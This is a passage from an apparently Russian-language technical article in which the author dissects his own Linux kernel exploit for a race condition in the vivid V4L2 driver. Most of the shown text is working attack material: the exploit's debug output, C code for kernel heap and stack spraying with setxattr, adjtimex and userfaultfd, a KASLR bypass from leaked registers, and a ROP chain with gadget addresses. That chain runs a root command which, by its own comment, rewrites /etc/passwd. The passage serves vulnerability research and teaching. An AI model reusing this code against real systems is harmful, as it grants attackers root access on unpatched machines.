\u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u044b \u0432 \u0445\u0440\u043e\u043d\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043f\u043e\u0440\u044f\u0434\u043a\u0435 \u043f\u043e \u0445\u043e\u0434\u0443 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430. \u0414\u0430\u043d\u043d\u0443\u044e \u0442\u0430\u0431\u043b\u0438\u0446\u0443 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043f\u043e\u0441\u0442\u0440\u043e\u0447\u043d\u043e, \u0434\u0435\u0440\u0436\u0430 \u0432 \u0443\u043c\u0435, \u0447\u0442\u043e \u0432\u0441\u0435 \u043f\u043e\u0442\u043e\u043a\u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u043f\u0430\u0440\u0430\u043b\u043b\u0435\u043b\u044c\u043d\u043e.<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/e68\/e73\/7dc\/e68e737dc9f94caaa58cc158d394aba9.png\"><\/p>\n<p>\u041f\u0440\u0438\u0432\u043e\u0436\u0443 \u043e\u0442\u043b\u0430\u0434\u043e\u0447\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u043e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c, \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u0432 \u0434\u0430\u043d\u043d\u043e\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u0435:<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041e\u0442\u043b\u0430\u0434\u043e\u0447\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">a13x@ubuntu_server_1804:~$ uname -a Linux ubuntu_server_1804 4.15.0-66-generic #75-Ubuntu SMP Tue Oct 1 05:24:09 UTC 2019 x86_64 x86_64 x86_64 GNU\/Linux a13x@ubuntu_server_1804:~$  a13x@ubuntu_server_1804:~$ .\/v4l2-pwn  begin as: uid=1000, euid=1000 Prepare the payload:  [+] payload for_heap is mmaped to 0x7f8c9e9b0000  [+] vivid_buffer of size 504 is at 0x7f8c9e9b0e08  [+] payload for_stack is mmaped to 0x7f8c9e9ae000  [+] timex of size 208 is at 0x7f8c9e9aef38  [+] userfaultfd #1 is configured: start 0x7f8c9e9b1000, len 0x1000  [+] userfaultfd #2 is configured: start 0x7f8c9e9af000, len 0x1000 We have 4 CPUs for racing; now create 50 pthreads...  [+] racer 1 is ready on CPU 1  [+] fatality is ready  [+] racer 0 is ready on CPU 0  [+] fault_handler for uffd 3 is ready  [+] kmsg parser is ready  [+] fault_handler for uffd 4 is ready  [+] 44 sprayers are ready (passed the barrier) Racer 1: GO! Racer 0: GO!  [+] found rsp &quot;ffffb93600eefd60&quot; in kmsg  [+] kernel stack top is 0xffffb93600ef0000  [+] found r11 &quot;ffffffff9d15d80d&quot; in kmsg  [+] kaslr_offset is 0x1a800000 Adapt payloads knowing that kstack is 0xffffb93600ef0000, kaslr_offset 0x1a800000:    vb2_queue of size 560 will be at 0xffffb93600eefe30, userspace 0x7f8c9e9aef38    mem_ops ptr will be at 0xffffb93600eefe68, userspace 0x7f8c9e9aef70, value 0xffffb93600eefe70    mem_ops struct of size 120 will be at 0xffffb93600eefe70, userspace 0x7f8c9e9aef78, vaddr 0xffffffff9bc725f1 at 0x7f8c9e9aefd0    rop chain will be at 0xffffb93600eefe80, userspace 0x7f8c9e9aef88    cmd will be at ffffb93600eefedc, userspace 0x7f8c9e9aefe4  [+] the payload for kernel heap and stack is ready. Put it.  [+] UFFD_EVENT_PAGEFAULT for uffd 4 on address = 0x7f8c9e9af000: 2 faults collected  [+] fault_handler for uffd 4 passed the barrier  [+] UFFD_EVENT_PAGEFAULT for uffd 3 on address = 0x7f8c9e9b1000: 44 faults collected  [+] fault_handler for uffd 3 passed the barrier  [+] and now fatality: run the shell command as root!<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<h2 id=\"anatomiya-poleznoy-nagruzki-eksployta\">\u0410\u043d\u0430\u0442\u043e\u043c\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430<\/h2>\n<p>  <\/p>\n<p>\u0412 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u0431\u044b\u043b\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 (\u043e\u0440\u043a\u0435\u0441\u0442\u0440\u0430\u0446\u0438\u044f, \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u0430\u0437\u0430\u0442\u044c) \u043f\u043e\u0442\u043e\u043a\u0430\u043c\u0438 \u0432 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0435. \u0411\u044b\u043b\u043e \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u043e, \u0447\u0442\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f:<\/p>\n<p>  <\/p>\n<ol>\n<li><code>sprayer<\/code>-\u043f\u043e\u0442\u043e\u043a\u0430\u043c\u0438 \u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u0439 \u043a\u0443\u0447\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 <code>setxattr()<\/code> \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u043c <code>userfaultfd()<\/code>;<\/li>\n<li><code>racer<\/code>-\u043f\u043e\u0442\u043e\u043a\u0430\u043c\u0438 \u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u0441\u0442\u0435\u043a\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 <code>adjtimex()<\/code> \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u043c <code>userfaultfd()<\/code>. \u0414\u0430\u043d\u043d\u044b\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u0432\u044b\u0437\u043e\u0432 \u0431\u044b\u043b \u0432\u044b\u0431\u0440\u0430\u043d \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043e\u043d \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u0441\u0442\u0435\u043a \u044f\u0434\u0440\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>copy_from_user()<\/code>.<\/li>\n<\/ol>\n<p>  <\/p>\n<p>\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 \u0442\u0440\u0435\u0445 \u0447\u0430\u0441\u0442\u0435\u0439:<\/p>\n<p>  <\/p>\n<ol>\n<li>\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 <code>vb2_buffer<\/code> \u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u0439 \u043a\u0443\u0447\u0435,<\/li>\n<li>\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 <code>vb2_queue<\/code> \u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u0441\u0442\u0435\u043a\u0435,<\/li>\n<li>\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 <code>vb2_mem_ops<\/code> \u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u0441\u0442\u0435\u043a\u0435.<\/li>\n<\/ol>\n<p>  <\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d \u043a\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b. \u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u043d\u0438\u0445 \u043f\u043e\u0434\u0433\u043e\u0442\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0432 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u043c \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u043c \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0435. \u0422\u0430\u043a \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u0430\u043c\u044f\u0442\u044c, \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u0443\u0434\u0435\u0442 \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u0432 \u044f\u0434\u0435\u0440\u043d\u0443\u044e \u043a\u0443\u0447\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>setxattr()<\/code>:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">#define MMAP_SZ 0x2000 #define PAYLOAD_SZ 504  void init_heap_payload() {     struct vivid_buffer *vbuf = NULL;     struct vb2_plane *vplane = NULL;      for_heap = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE,                     MAP_SHARED | MAP_ANONYMOUS, -1, 0);     if (for_heap == MAP_FAILED)         err_exit(&quot;[-] mmap&quot;);      printf(&quot; [+] payload for_heap is mmaped to %p\\n&quot;, for_heap);      \/* Don't touch the second page (needed for userfaultfd) *\/     memset(for_heap, 0, PAGE_SIZE);      xattr_addr = for_heap + PAGE_SIZE - PAYLOAD_SZ;      vbuf = (struct vivid_buffer *)xattr_addr;      vbuf-&gt;vb.vb2_buf.num_planes = 1;     vplane = vbuf-&gt;vb.vb2_buf.planes;     vplane-&gt;bytesused = 16;     vplane-&gt;length = 16;     vplane-&gt;min_length = 16;      printf(&quot; [+] vivid_buffer of size %lu is at %p\\n&quot;,                     sizeof(struct vivid_buffer), vbuf); }<\/code><\/pre>\n<p>  <\/p>\n<p>\u0422\u0430\u043a \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u0430\u043c\u044f\u0442\u044c, \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u0443\u0434\u0435\u0442 \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u0432 \u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u0441\u0442\u0435\u043a \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 <code>adjtimex()<\/code>:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">#define PAYLOAD2_SZ 208  void init_stack_payload() {     for_stack = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE,                         MAP_SHARED | MAP_ANONYMOUS, -1, 0);     if (for_stack == MAP_FAILED)         err_exit(&quot;[-] mmap&quot;);      printf(&quot; [+] payload for_stack is mmaped to %p\\n&quot;, for_stack);      \/* Don't touch the second page (needed for userfaultfd) *\/     memset(for_stack, 0, PAGE_SIZE);      timex_addr = for_stack + PAGE_SIZE - PAYLOAD2_SZ + 8;     printf(&quot; [+] timex of size %lu is at %p\\n&quot;,                 sizeof(struct timex), timex_addr); }<\/code><\/pre>\n<p>  <\/p>\n<p>\u041a\u0430\u043a \u0431\u044b\u043b\u043e \u0441\u043a\u0430\u0437\u0430\u043d\u043e \u0432\u044b\u0448\u0435, \u043f\u043e\u0441\u043b\u0435 \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438 \u043f\u043e\u0442\u043e\u043a, \u0447\u0438\u0442\u0430\u044e\u0449\u0438\u0439 \u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u0436\u0443\u0440\u043d\u0430\u043b, \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442 \u0438\u0437 \u043d\u0435\u0433\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e:<\/p>\n<p>  <\/p>\n<ul>\n<li>\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430 <code>RSP<\/code>, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0447\u0438\u0441\u043b\u0438\u0442\u044c \u0430\u0434\u0440\u0435\u0441 \u0432\u0435\u0440\u0445\u0443\u0448\u043a\u0438 \u0441\u0442\u0435\u043a\u0430;<\/li>\n<li>\n<p>\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430 <code>R11<\/code>, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0435\u043c \u043d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u0447\u0430\u0441\u0442\u043e\u043a \u043a\u043e\u0434\u0430 \u044f\u0434\u0440\u0430. \u042d\u0442\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0432\u044b\u0447\u0438\u0441\u043b\u0438\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u0439 \u043e\u0442\u0441\u0442\u0443\u043f <code>KASLR<\/code>, \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d \u043a\u043e\u0434 \u044f\u0434\u0440\u0430:   <\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">#define R11_COMPONENT_TO_KASLR_OFFSET 0x195d80d #define KERNEL_TEXT_BASE 0xffffffff81000000  kaslr_offset = strtoul(r11, NULL, 16); kaslr_offset -= R11_COMPONENT_TO_KASLR_OFFSET; if (kaslr_offset &lt; KERNEL_TEXT_BASE) {     printf(&quot;bad kernel text base 0x%lx\\n&quot;, kaslr_offset);     err_exit(&quot;[-] kmsg parsing for r11&quot;); } kaslr_offset -= KERNEL_TEXT_BASE;<\/code><\/pre>\n<p>  <\/li>\n<\/ul>\n<p>  <\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u043f\u043e\u0442\u043e\u043a, \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0432\u0448\u0438\u0439 <code>kmsg<\/code>, \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u0443\u0435\u0442 \u0430\u0434\u0440\u0435\u0441\u0430 \u0432 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0434\u043b\u044f \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u0441\u0442\u0435\u043a\u0430 \u0438 \u043a\u0443\u0447\u0438. \u042d\u0442\u043e \u0441\u0430\u043c\u0430\u044f \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u0438 \u0441\u043b\u043e\u0436\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438. \u041f\u0440\u0438 \u0447\u0442\u0435\u043d\u0438\u0438 \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043f\u043e\u043b\u0435\u0437\u043d\u043e \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c\u0441\u044f \u043a \u043e\u0442\u043b\u0430\u0434\u043e\u0447\u043d\u043e\u043c\u0443 \u0432\u044b\u0432\u043e\u0434\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 (\u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d \u0432\u044b\u0448\u0435).<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">#define TIMEX_STACK_OFFSET 0x1d0  #define LIST_OFFSET 24 #define OPS_OFFSET 64 #define CMD_OFFSET 172  struct vivid_buffer *vbuf = (struct vivid_buffer *)xattr_addr; struct vb2_queue *vq = NULL; struct vb2_mem_ops *memops = NULL; struct vb2_plane *vplane = NULL;  printf(&quot;Adapt payloads knowing that kstack is 0x%lx, kaslr_offset 0x%lx:\\n&quot;,        kstack,        kaslr_offset);  \/* point to future position of vb2_queue in timex payload on kernel stack *\/ vbuf-&gt;vb.vb2_buf.vb2_queue = (struct vb2_queue *)(kstack - TIMEX_STACK_OFFSET); vq = (struct vb2_queue *)timex_addr; printf(&quot; vb2_queue of size %lu will be at %p, userspace %p\\n&quot;,        sizeof(struct vb2_queue),        vbuf-&gt;vb.vb2_buf.vb2_queue,        vq);  \/* just to survive vivid list operations *\/ vbuf-&gt;list.next = (struct list_head *)(kstack - TIMEX_STACK_OFFSET + LIST_OFFSET); vbuf-&gt;list.prev = (struct list_head *)(kstack - TIMEX_STACK_OFFSET + LIST_OFFSET);  \/*  * point to future position of vb2_mem_ops in timex payload on kernel stack;  * mem_ops offset is 0x38, be careful with OPS_OFFSET  *\/ vq-&gt;mem_ops = (struct vb2_mem_ops *)(kstack - TIMEX_STACK_OFFSET + OPS_OFFSET); printf(&quot; mem_ops ptr will be at %p, userspace %p, value %p\\n&quot;,        &amp;(vbuf-&gt;vb.vb2_buf.vb2_queue-&gt;mem_ops),        &amp;(vq-&gt;mem_ops),        vq-&gt;mem_ops);  memops = (struct vb2_mem_ops *)(timex_addr + OPS_OFFSET);  \/* vaddr offset is 0x58, be careful with ROP_CHAIN_OFFSET *\/ memops-&gt;vaddr = (void *)ROP__PUSH_RDI__POP_RSP__pop_rbp__or_eax_edx__RET                                                           + kaslr_offset; printf(&quot; mem_ops struct of size %lu will be at %p, userspace %p, vaddr %p at %p\\n&quot;,        sizeof(struct vb2_mem_ops),        vq-&gt;mem_ops,        memops,        memops-&gt;vaddr,        &amp;(memops-&gt;vaddr));<\/code><\/pre>\n<p>  <\/p>\n<p>\u041d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0441\u0445\u0435\u043c\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043e, \u043a\u0430\u043a \u0447\u0430\u0441\u0442\u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u0437\u0430\u0438\u043c\u043e\u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0432 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u043c \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0435 \u044f\u0434\u0440\u0430 \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0439 \u0430\u0434\u0430\u043f\u0442\u0430\u0446\u0438\u0438.<br \/>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/7d0\/4ca\/d2f\/7d04cad2f760d5c442e11752ab98dd66.png\" alt=\"payload anatomy\"><\/p>\n<p>  <\/p>\n<h2 id=\"ropnjop\">ROP&#8217;n&#8217;JOP<\/h2>\n<p>  <\/p>\n<p>\u0412 \u044d\u0442\u043e\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0430 ROP-\u0446\u0435\u043f\u043e\u0447\u043a\u0430 (Return-Oriented Programming), \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u044f \u0441\u043e\u0437\u0434\u0430\u043b \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0430 \u043f\u043e\u0442\u043e\u043a\u0430 \u044f\u0434\u0440\u0430.<\/p>\n<p>  <\/p>\n<p>\u042f \u043d\u0430\u0448\u0435\u043b \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 ROP-\u0433\u0430\u0434\u0436\u0435\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0441\u0442\u0435\u043a \u044f\u0434\u0440\u0430 \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u0443\u044e \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u0438 (stack-pivoting gadget) \u0438 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0445\u043e\u0440\u043e\u0448\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043a \u043f\u0440\u043e\u0442\u043e\u0442\u0438\u043f\u0443 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>void *(*vaddr)(void *buf_priv)<\/code>, \u0433\u0434\u0435 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u043f\u043e\u0442\u043e\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430 <code>buf_priv<\/code> \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 <code>vb2_plane.mem_priv<\/code>, \u043d\u0430\u0434 \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0435\u0441\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c. \u0412 \u044f\u0434\u0440\u0435 Linux \u0434\u043b\u044f \u043c\u0438\u043a\u0440\u043e\u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b <code>x86_64<\/code> \u043f\u0435\u0440\u0432\u044b\u0439 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u0433\u0438\u0441\u0442\u0440 <code>RDI<\/code>. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0441\u0432\u044f\u0437\u043a\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439 <code>push rdi; pop rsp<\/code> \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u0441\u0442\u0435\u043a\u0430 \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u0443\u044e \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u0441\u0442\u0435\u043a\u0435, \u0447\u0442\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u043e\u0431\u0445\u043e\u0434 \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b <code>SMAP<\/code> \u0438 <code>SMEP<\/code>.<\/p>\n<p>  <\/p>\n<p>\u041d\u0438\u0436\u0435 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d\u0430 \u0441\u0430\u043c\u0430 ROP-\u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u041e\u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430\u0441\u044c \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u043e\u0439, \u0442\u0430\u043a \u043a\u0430\u043a \u043e\u043d\u0430 \u0434\u043e\u043b\u0436\u043d\u0430 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0430 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0430 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">#define ROP__PUSH_RDI__POP_RSP__pop_rbp__or_eax_edx__RET 0xffffffff814725f1 #define ROP__POP_R15__RET 0xffffffff81084ecf #define ROP__POP_RDI__RET 0xffffffff8101ef05 #define ROP__JMP_R15 0xffffffff81c071be #define ADDR_RUN_CMD 0xffffffff810b4ed0 #define ADDR_DO_TASK_DEAD 0xffffffff810bf260  unsigned long *rop = NULL; char *cmd = &quot;\/bin\/sh \/home\/a13x\/pwn&quot;; \/* rewrites \/etc\/passwd dropping root pwd *\/ size_t cmdlen = strlen(cmd) + 1; \/* for 0 byte *\/  \/* mem_priv is the arg for vaddr() *\/ vplane = vbuf-&gt;vb.vb2_buf.planes; vplane-&gt;mem_priv = (void *)(kstack - TIMEX_STACK_OFFSET + ROP_CHAIN_OFFSET);  rop = (unsigned long *)(timex_addr + ROP_CHAIN_OFFSET); printf(&quot;   rop chain will be at %p, userspace %p\\n&quot;, vplane-&gt;mem_priv, rop);  strncpy((char *)timex_addr + CMD_OFFSET, cmd, cmdlen); printf(&quot;   cmd will be at %lx, userspace %p\\n&quot;,        (kstack - TIMEX_STACK_OFFSET + CMD_OFFSET),        (char *)timex_addr + CMD_OFFSET);  \/* stack will be trashed near rop chain, be careful with CMD_OFFSET *\/ *rop++ = 0x1337133713371337; \/* placeholder for pop rbp in the pivoting gadget *\/ *rop++ = ROP__POP_R15__RET + kaslr_offset; *rop++ = ADDR_RUN_CMD + kaslr_offset; *rop++ = ROP__POP_RDI__RET + kaslr_offset; *rop++ = (unsigned long)(kstack - TIMEX_STACK_OFFSET + CMD_OFFSET); *rop++ = ROP__JMP_R15 + kaslr_offset; *rop++ = ROP__POP_R15__RET + kaslr_offset; *rop++ = ADDR_DO_TASK_DEAD + kaslr_offset; *rop++ = ROP__JMP_R15 + kaslr_offset;  printf(&quot; [+] the payload for kernel heap and stack is ready. Put it.\\n&quot;);<\/code><\/pre>\n<p>  <\/p>\n<p>\u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0434\u0430\u043d\u043d\u0430\u044f ROP-\u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0430\u0434\u0440\u0435\u0441 \u044f\u0434\u0435\u0440\u043d\u043e\u0439 